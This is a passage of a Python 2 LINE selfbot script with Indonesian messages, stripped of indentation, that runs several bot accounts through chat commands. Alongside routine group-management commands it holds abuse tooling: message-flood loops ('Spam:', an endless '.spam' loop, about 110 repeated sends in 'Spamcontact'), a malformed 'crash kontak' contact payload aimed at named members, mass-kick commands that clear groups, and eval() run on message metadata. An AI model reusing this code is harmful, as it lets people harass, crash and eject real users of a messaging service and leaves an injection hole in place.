kr1.sendText(msg.to,"Nama Jam Berubah menjadi:" + n)
elif msg.text in ["update","Update"]:
if msg.from_ in admin:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"?%H:%M?")
profile = kr1.getProfile()
profile.displayName = wait["cName"] + nowT
kr1.updateProfile(profile)
kr1.sendText(msg.to,"Diperbarui")
else:
kr1.sendText(msg.to,"Silahkan Aktifkan Jam")
#==========================[WIB]===========================
# "Image <query>": scrape Google Images and send one random result.
elif "Image " in msg.text:
#if msg.from_ in admin:
search = msg.text.replace("Image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
# Python-2 print statement (this file is Python 2 throughout).
print path
try:
kr1.sendImageWithURL(msg.to,path)
except:
pass
#==========================[WIB]===========================
#==========================[WIB]===========================
elif "Spam change:" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
wait['spam'] = msg.text.replace("Spam change:","")
kr1.sendText(msg.to,"spam changed")
#==========================[WIB]===========================
elif "Spam add:" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
wait['spam'] = msg.text.replace("Spam add:","")
if wait["lang"] == "JP":
kr1.sendText(msg.to,"spam changed")
else:
kr1.sendText(msg.to,"Done")
#==========================[WIB]===========================
elif "Spam:" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
strnum = msg.text.replace("Spam:","")
num = int(strnum)
for var in range(0,num):
kr1.sendText(msg.to, wait['spam'])
#==========================[WIB]===========================
elif ".spam " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
bctxt = msg.text.replace(".spam ", "")
t = kr1.getAllContactIds()
t = 500
while(t):
kr1.sendText(msg.to, (bctxt))
#==========================[WIB]===========================
elif "Spamcontact @" in msg.text:
if msg.from_ in owner:
_name = msg.text.replace("Spamcontact @","")
_nametarget = _name.rstrip(' ')
gs = kr1.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(g.mid,'spam')
kr1.sendText(msg.to, "Selesai di Spam")
print " Spammed !"
#==========================[WIB]===========================
elif "crkontak @" in msg.text:
if msg.from_ in owner:
_name = msg.text.replace("crkontak @","")
_nametarget = _name.rstrip(' ')
msg.contentType = 13
msg.contentMetadata = {'mid': "u1f41296217e740650e0448b96851a3e2',"}
msg.text = None
gs = kr1.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
try:
kr1.sendMessage(g.mid,msg)
kr1.sendText(msg.to, "crash kontak selesai")
print " Spammed crash !"
except:
pass
#==========================[WIB]===========================
elif msg.text in ["Invite"]:
if msg.from_ in admin:
wait["invite"] = True
kr1.sendText(msg.to,"Kirim Contact")
#==========================[WIB]===========================
elif msg.text in ["Jepit"]:
if msg.from_ in admin:
wait["invite2"] = True
random.choice(KAC).sendText(msg.to,"Kirim Contact")
#==========================[WIB]===========================
elif msg.text in ["Undang"]:
if msg.from_ in admin:
wait["winvite"] = True
kr2.sendText(msg.to,"Kirim Contact")
#==========================[WIB]===========================
elif msg.text in ["Steal contact"]:
if msg.from_ in admin:
wait['contact'] = True
kr1.sendText(msg.to,"Send Contact")
#==========================[WIB]===========================
elif msg.text in ["Like:me","Like me"]: #Semua Bot Ngelike Status Akun Utama
if msg.from_ in admin:
print "[Command]Like executed"
kr1.sendText(msg.to,"Like Status Owner")
try:
likeme()
except:
pass
#==========================[WIB]===========================
elif msg.text in ["Like:friend","Like friend"]: #Semua Bot Ngelike Status Teman
if msg.from_ in admin:
print "[Command]Like executed"
kr1.sendText(msg.to,"Like Status Teman")
try:
likefriend()
except:
pass
#==========================[WIB]===========================
elif msg.text in ["Like:on","Like on"]:
if msg.from_ in admin:
if wait['likeOn'] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Done")
else:
wait['likeOn'] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Already")
#==========================[WIB]===========================
elif msg.text in ["Like off","Like:off"]:
if msg.from_ in admin:
if wait['likeOn'] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Done")
else:
wait['likeOn'] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Already")
#==========================[WIB]===========================
elif msg.text in ["Simisimi on","Simisimi:on"]:
#if msg.from_ in admin:
settings["simiSimi"][msg.to] = True
kr1.sendText(msg.to,"Simi mode On")
#==========================[WIB]===========================
elif msg.text in ["Simisimi off","Simisimi:off"]:
#if msg.from_ in admin:
settings["simiSimi"][msg.to] = False
kr1.sendText(msg.to,"Simi mode Off")
#==========================[WIB]===========================
elif msg.text in ["Tag on","tag on"]:
#if msg.from_ in admin:
wait['detectMention'] = True
kr1.sendText(msg.to,"Auto respon tag On")
#==========================[WIB]===========================
elif msg.text in ["Tag off","tag off"]:
if msg.from_ in admin:
wait['detectMention'] = False
kr1.sendText(msg.to,"Auto respon tag Off")
#==========================[WIB]===========================
elif msg.text in ["Respoto on","respoto on"]:
if msg.from_ in admin:
wait['potoMention'] = True
kr1.sendText(msg.to,"Auto respon tag poto On")
#==========================[WIB]===========================
elif msg.text in ["Respoto off","respoto off"]:
if msg.from_ in admin:
wait['potoMention'] = False
kr1.sendText(msg.to,"Auto respon tag poto Off")
#==========================[WIB]===========================
elif msg.text in ["Tag2 on","tag2 on"]:
if msg.from_ in admin:
wait['kickMention'] = True
kr1.sendText(msg.to,"Auto Kick tag ON")
#==========================[WIB]===========================
elif msg.text in ["Tag2 off","tag2 off"]:
if msg.from_ in admin:
wait['kickMention'] = False
kr1.sendText(msg.to,"Auto Kick tag OFF")
#==========================[WIB]===========================
elif "Time" in msg.text:
if msg.toType == 2:
kr1.sendText(msg.to,datetime.today().strftime('%H:%M:%S'))
#==========================[WIB]===========================
elif msg.text in ["Sambut on","sambut on"]:
if msg.from_ in admin:
if wait["Wc"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"noтιғ yg joιn on")
else:
wait["Wc"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"already on")
elif msg.text in ["Sambut off","sambut off"]:
if msg.from_ in admin:
if wait["Wc"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"noтιғ yg joιn oғғ")
else:
wait["Wc"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"already oғғ")
#==========================[WIB]===========================
elif msg.text in ["Sambut2 on","sambut2 on"]:
if msg.from_ in admin:
if wait["Wc2"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"noтιғ yg joιn poto on")
else:
wait["Wc2"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"already on")
elif msg.text in ["Sambut2 off","sambut2 off"]:
if msg.from_ in admin:
if wait["Wc2"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"noтιғ yg joιn poto oғғ")
else:
wait["Wc2"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"already oғғ")
#==========================[WIB]===========================
elif msg.text in ["Pergi on","pergi on"]:
if msg.from_ in admin:
if wait["Lv"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"noтιғ yg leave on")
else:
wait["Lv"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"already on")
elif msg.text in ["Pergi off","pergi off"]:
if msg.from_ in admin:
if wait["Lv"] == False:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"noтιғ yg leave oғғ")
else:
wait["Lv"] = False
if wait["lang"] == "JP":
kr1.sendText(msg.to,"already oғғ")
#==========================[WIB]===========================
elif "Bye bye" in msg.text:
if msg.from_ in owner:
if msg.toType == 2:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Dadas","")
gs = kr1.getGroup(msg.to)
gs = kr2.getGroup(msg.to)
gs = kr3.getGroup(msg.to)
kr1.sendText(msg.to,"Jangan panik, santai aja ya ô")
kr2.sendText(msg.to,"Group di bersihkan...!!")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
kr1.sendText(msg.to,"Tidak di temukan")
kr2.sendText(msg.to,"Tidak di temukan")
else:
for target in targets:
if target not in admin:
try:
klist=[kr1,kr2,kr3]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
kr1.sendText(msg.to,"Group Bersih")
kr2.sendText(msg.to,"Group Bersih")
#==========================[WIB]===========================
elif msg.text in ["Salam1"]:
kr1.sendText(msg.to,"السَّلاَمُ عَلَيْكُمْ وَرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
kr2.sendText(msg.to,"Assalamu'alaikum")
elif msg.text in ["Salam2"]:
kr1.sendText(msg.to,"وَعَلَيْكُمْ السَّلاَمُرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
kr2.sendText(msg.to,"Wa'alaikumsallam.Wr,Wb")
elif msg.text in ["Salam3"]:
if msg.from_ in owner:
kr1.sendText(msg.to,"السَّلاَمُ عَلَيْكُمْ وَرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
kr2.sendText(msg.to,"Assalamu'alaikum")
kr3.sendText(msg.to,"وَعَلَيْكُمْ السَّلاَمُ وَرَحْمَةُ اللهِوَبَرَكَاتُهُ")
kr3.sendText(msg.to,"Wa'alaikumsallam.Wr,Wb")
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Salam3","")
gs = kr1.getGroup(msg.to)
gs = kr2.getGroup(msg.to)
gs = kr3.getGroup(msg.to)
kr1.sendText(msg.to,"maaf kalo gak sopan")
kr2.sendText(msg.to,"Qo salamnya gak ada yang jawab ya..!!")
kr3.sendText(msg.to,"hehehhehe")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
kr1.sendText(msg.to,"Tidak di temukan")
else:
for target in targets:
if target not in admin:
try:
klist=[kr1,kr2,kr3]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
kr1.sendText(msg.to,"السَّلاَمُ عَلَيْكُمْ وَرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
kr2.sendText(msg.to,"وَعَلَيْكُمْ السَّلاَمُ وَرَحْمَةُ اللهِوَبَرَكَاتُهُ")
kr3.sendText(msg.to,"Nah salamnya jawab sendiri jadinya wkwkwk..!!")
#==========================[WIB]===========================
elif ("Kick " in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
kr1.kickoutFromGroup(msg.to,[target])
except:
kr1.sendText(msg.to,"Error")
#==========================[WIB]===========================
elif ("Cium " in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in admin:
try:
kr1.kickoutFromGroup(msg.to,[target])
#kr1.inviteIntoGroup(msg.to,[admin])
#kr1.cancelGroupInvitation(msg.to,[target])
except:
kr1.sendText(msg.to,"Error")
#==========================[WIB]===========================
# elif "Tajong " in msg.text:
# if msg.from_ in admin:
# nk0 = msg.text.replace("Tajong ","")
# nk1 = nk0.lstrip()
# nk2 = nk1.replace("@","")
# nk3 = nk2.rstrip()
# _name = nk3
# gs = kr1.getGroup(msg.to)
# ginfo = kr1.getGroup(msg.to)
# gs.preventJoinByTicket = False
# kr1.updateGroup(gs)
# invsend = 0
# Ticket = kr1.reissueGroupTicket(msg.to)
# kr6.acceptGroupInvitationByTicket(msg.to,Ticket)
# time.sleep(0.01)
# targets = []
# for s in gs.members:
# if _name in s.displayName:
# targets.append(s.mid)
# if targets == []:
# sendMessage(msg.to,"user does not exist")
# pass
# else:
# for target in targets:
# try:
# kr6.kickoutFromGroup(msg.to,[target])
# print (msg.to,[g.mid])
# except:
# kr6.leaveGroup(msg.to)
# gs = kr1.getGroup(msg.to)
# gs.preventJoinByTicket = True
# kr1.updateGroup(gs)
# gs.preventJoinByTicket(gs)
# kr1.updateGroup(gs)
#==========================[WIB]===========================
elif "Kick: " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Kick: ","")
kr1.kickoutFromGroup(msg.to,[midd])
#==========================[WIB]===========================
elif "invite " in msg.text.lower():
if msg.from_ in admin:
key = msg.text[-33:]
kr1.findAndAddContactsByMid(key)
kr1.inviteIntoGroup(msg.to, [key])
contact = kr1.getContact(key)
#==========================[WIB]===========================
elif msg.text in ["cancel","Cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
group = kr1.getGroup(msg.to)
if group.invitee is not None:
gInviMids = [contact.mid for contact in group.invitee]
kr1.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Tidak ada undangan")
else:
kr1.sendText(msg.to,"Invitan tidak ada")
else:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Tidak ada undangan")
else:
kr1.sendText(msg.to,"Invitan tidak ada")
#==========================[WIB]===========================
elif msg.text in ["link on","Link on"]:
if msg.from_ in admin:
if msg.toType == 2:
group = kr1.getGroup(msg.to)
group.preventJoinByTicket = False
kr1.updateGroup(group)
if wait["lang"] == "JP":
kr1.sendText(msg.to,"URL open")
else:
kr1.sendText(msg.to,"URL open")
else:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"It can not be used outside the group")
else:
kr1.sendText(msg.to,"Can not be used for groups other than")
#==========================[WIB]===========================
elif msg.text in ["link off","Link off"]:
if msg.from_ in admin:
if msg.toType == 2:
group = kr1.getGroup(msg.to)
group.preventJoinByTicket = True
kr1.updateGroup(group)
if wait["lang"] == "JP":
kr1.sendText(msg.to,"URL close")
else:
kr1.sendText(msg.to,"URL close")
else:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"It can not be used outside the group")
else:
kr1.sendText(msg.to,"Can not be used for groups other than")
#==========================[WIB]===========================
elif msg.text in ["Url","Gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
g = kr1.getGroup(msg.to)
if g.preventJoinByTicket == True:
g.preventJoinByTicket = False
kr1.updateGroup(g)
gurl = kr1.reissueGroupTicket(msg.to)
kr1.sendText(msg.to,"line://ti/g/" + gurl)
#==========================[WIB]===========================
elif "Gcreator" == msg.text:
try:
group = kr1.getGroup(msg.to)
GS = group.creator.mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': GS}
kr1.sendMessage(M)
except:
W = group.members[0].mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': W}
kr1.sendMessage(M)
kr1.sendText(msg.to,"Creator Grup")
#==========================[WIB]===========================
elif msg.text in ["invite:gcreator"]:
if msg.from_ in admin:
if msg.toType == 2:
ginfo = kr1.getGroup(msg.to)
try:
gcmid = ginfo.creator.mid
except:
gcmid = "Error"
if wait["lang"] == "JP":
kr1.inviteIntoGroup(msg.to,[gcmid])
else:
kr1.inviteIntoGroup(msg.to,[gcmid])
#==========================[WIB]===========================
elif ("Gname: " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = kr1.getGroup(msg.to)
X.name = msg.text.replace("Gname: ","")
kr1.updateGroup(X)
#==========================[WIB]===========================
elif msg.text in ["infogrup","Infogrup"]:
if msg.from_ in admin:
group = kr1.getGroup(msg.to)
try:
gCreator = group.creator.displayName
except:
gCreator = "Error"
md = "[Nama Grup : ]\n" + group.name + "\n\n[Id Grup : ]\n" + group.id + "\n\n[Pembuat Grup :]\n" + gCreator + "\n\n[Gambar Grup : ]\nhttp://dl.profile.line-cdn.net/" + group.pictureStatus
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
kr1.sendText(msg.to,md)
#==========================[WIB]===========================
elif msg.text in ["Oswib"]:
random.choice(KAC).sendImageWithURL(msg.to)
random.choice(KAC).sendText(msg.to,"↥↥↥↥↥↪ Pembuat Bots ↩↥↥↥↥↥")
#==========================[WIB]===========================
elif msg.text in ["grup id","Grup id"]:
if msg.from_ in owner:
gid = kr1.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (kr1.getGroup(i).name,i)
kr1.sendText(msg.to,h)
#==========================[WIB]===========================
elif msg.text in ["Glist"]:
if msg.from_ in admin:
gid = kr1.getGroupIdsJoined()
h = ""
for i in gid:
h += "%s\n" % (kr1.getGroup(i).name +" ? ["+str(len(kr1.getGroup(i).members))+"]")
kr1.sendText(msg.to,"-- List Groups --\n\n"+ h +"\nTotal groups =" +" ["+str(len(gid))+"]")
#==========================[WIB]===========================
elif msg.text in ["Glist2"]:
if msg.from_ in admin:
gid = kr2.getGroupIdsJoined()
h = ""
for i in gid:
h += "%s\n" % (kr2.getGroup(i).name +" ? ["+str(len(kr2.getGroup(i).members))+"]")
kr2.sendText(msg.to,"-- List Groups --\n\n"+ h +"\nTotal groups =" +" ["+str(len(gid))+"]")
#==========================[WIB]===========================
elif msg.text in ["Glist3"]:
if msg.from_ in admin:
gid = kr3.getGroupIdsJoined()
h = ""
for i in gid:
h += "%s\n" % (kr3.getGroup(i).name +" ? ["+str(len(kr3.getGroup(i).members))+"]")
kr3.sendText(msg.to,"-- List Groups --\n\n"+ h +"\nTotal groups =" +" ["+str(len(gid))+"]")
#==========================[WIB]===========================
elif msg.text in ["gcancel","Gcancel"]:
if msg.from_ in admin:
gid = kr1.getGroupIdsInvited()
for i in gid:
kr1.rejectGroupInvitation(i)
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Aku menolak semua undangan")
else:
kr1.sendText(msg.to,"He declined all invitations")
#==========================[WIB]===========================
elif "Auto add" in msg.text:
if msg.from_ in admin:
thisgroup = kr1.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
kr1.findAndAddContactsByMids(mi_d)
kr1.sendText(msg.to,"Success Add all")
#==========================[WIB]===========================
elif "Admin add @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff add executing"
_name = msg.text.replace("Admin add @","")
_nametarget = _name.rstrip(' ')
gs = kr1.getGroup(msg.to)
gs = kr2.getGroup(msg.to)
gs = kr3.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.append(target)
kr1.sendText(msg.to,"Admin Ditambahkan")
except:
pass
print "[Command]Staff add executed"
else:
kr1.sendText(msg.to,"Perintah Ditolak.")
kr1.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
#==========================[WIB]===========================
elif "Admin remove @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff remove executing"
_name = msg.text.replace("Admin remove @","")
_nametarget = _name.rstrip(' ')
gs = kr1.getGroup(msg.to)
gs = kr2.getGroup(msg.to)
gs = kr3.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.remove(target)
kr1.sendText(msg.to,"Admin Dihapus")
except:
pass
print "[Command]Staff remove executed"
else:
kr1.sendText(msg.to,"Perintah Ditolak.")
kr1.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
#==========================[WIB]===========================
elif msg.text in ["Adminlist","adminlist"]:
if admin == []:
kr1.sendText(msg.to,"The stafflist is empty")
else:
kr1.sendText(msg.to,"Tunggu...")
mc = "╔═════════════\nAdmin 🌷 WIB 🌷 \n╠═════════════\n"
for mi_d in admin:
mc += "••>" +kr1.getContact(mi_d).displayName + "\n╠═════════════\n"
kr1.sendText(msg.to,mc)
print "[Command]Stafflist executed"
#==========================[WIB]===========================
elif msg.text in ["Sayang","asup"]: #Panggil Semua Bot
if msg.from_ in owner:
G = kr1.getGroup(msg.to)
ginfo = kr1.getGroup(msg.to)
G.preventJoinByTicket = False
kr1.updateGroup(G)
invsend = 0
Ticket = kr1.reissueGroupTicket(msg.to)
kr2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
kr3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = kr1.getGroup(msg.to)
ginfo = kr1.getGroup(msg.to)
G.preventJoinByTicket = True
kr1.updateGroup(G)
kr3.sendText(msg.to,"Hallo...!!! " + str(ginfo.name) + "\n\nSemoga Selalu Bahagia...!!!")
print "Semua Sudah Lengkap"
#==========================[WIB]===========================
elif msg.text in [".."]: #Panggil Semua Bot
if msg.from_ in owner:
G = kr1.getGroup(msg.to)
ginfo = kr1.getGroup(msg.to)
midd2 = msg.text.replace("..","")
midd3 = msg.text.replace("..","")
kr1.findAndAddContactsByMid(midd2)
kr1.findAndAddContactsByMid(midd3)
kr1.inviteIntoGroup(msg.to,[midd2])
kr1.inviteIntoGroup(msg.to,[midd3])
kr2.acceptGroupInvitation(msg.to)
kr3.acceptGroupInvitation(msg.to)
kr3.sendText(msg.to,"Hallo...!!! " + str(ginfo.name) + "\n\nSemoga Selalu Bahagia...!!!")
print "Semua Sudah Lengkap"
elif msg.text in ["."]: #Panggil Bot induk
if msg.from_ in owner:
G = kr2.getGroup(msg.to)
G = kr3.getGroup(msg.to)
ginfo = kr2.getGroup(msg.to)
ginfo = kr3.getGroup(msg.to)
midd1 = msg.text.replace(".","u0710a42a75e0a476ad687639db8c069c")
random.choice(KAC).findAndAddContactsByMid(midd1)
random.choice(KAC).inviteIntoGroup(msg.to,[midd1])
kr1.acceptGroupInvitation(msg.to)
print "Induk Sudah Masuk"
#==========================[WIB]===========================
elif msg.text in ["Out all"]:#keluar semua bots
if msg.from_ in owner:
if msg.toType == 2:
ginfo = kr1.getGroup(msg.to)
ginfo = kr2.getGroup(msg.to)
ginfo = kr3.getGroup(msg.to)
try:
kr3.sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nJangan Lupa Bahagia...!!!")
kr3.leaveGroup(msg.to)
kr2.leaveGroup(msg.to)
kr1.leaveGroup(msg.to)
except:
pass
#==========================[WIB]===========================
elif msg.text in ["Pulang"]:#keluar bot kecuali bot induk
if msg.from_ in owner:
if msg.toType == 2:
ginfo = kr1.getGroup(msg.to)
ginfo = kr2.getGroup(msg.to)
ginfo = kr3.getGroup(msg.to)
try:
kr3.sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nJangan Lupa Bahagia...!!!")
kr3.leaveGroup(msg.to)
#kr2.leaveGroup(msg.to)
#kr1.leaveGroup(msg.to)
except:
pass
#==========================[WIB]===========================
elif "ehem" == msg.text.lower():
if msg.from_ in admin:
group = kr1.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
summon(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 99):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, len(nama)-1):
nm2 += [nama[j]]
summon(msg.to, nm2)
if jml > 200 and jml < 500:
for i in range(0, 99):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, 199):
nm2 += [nama[j]]
summon(msg.to, nm2)
for k in range(200, 299):
nm3 += [nama[k]]
summon(msg.to, nm3)
for l in range(300, 399):
nm4 += [nama[l]]
summon(msg.to, nm4)
for m in range(400, len(nama)-1):
nm5 += [nama[m]]
summon(msg.to, nm5)
if jml > 500:
print "Terlalu Banyak Men 500+"
cnt = Message()
cnt.text = "Jumlah:\n" + str(jml) + " Members"
cnt.to = msg.to
kr1.sendMessage(cnt)
#==========================[WIB]===========================
elif "ats" == msg.text.lower():
if msg.from_ in admin:
group = kr1.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
summon(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 99):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, len(nama)-1):
nm2 += [nama[j]]
summon(msg.to, nm2)
if jml > 200 and jml < 500:
for i in range(0, 99):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, 199):
nm2 += [nama[j]]
summon(msg.to, nm2)
for k in range(200, 299):
nm3 += [nama[k]]
summon(msg.to, nm3)
for l in range(300, 399):
nm4 += [nama[l]]
summon(msg.to, nm4)
for m in range(400, len(nama)-1):
nm5 += [nama[m]]
summon(msg.to, nm5)
if jml > 500:
print "Terlalu Banyak Men 500+"
cnt = Message()
cnt.text = "Jumlah:\n" + str(jml) + " Members"
cnt.to = msg.to
kr1.sendMessage(cnt)
#==========================[WIB]===========================
elif "cctv on" == msg.text.lower():
#if msg.from_ in admin:
if msg.to in wait2['readPoint']:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
kr1.sendText(msg.to,"Setpoint already on")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
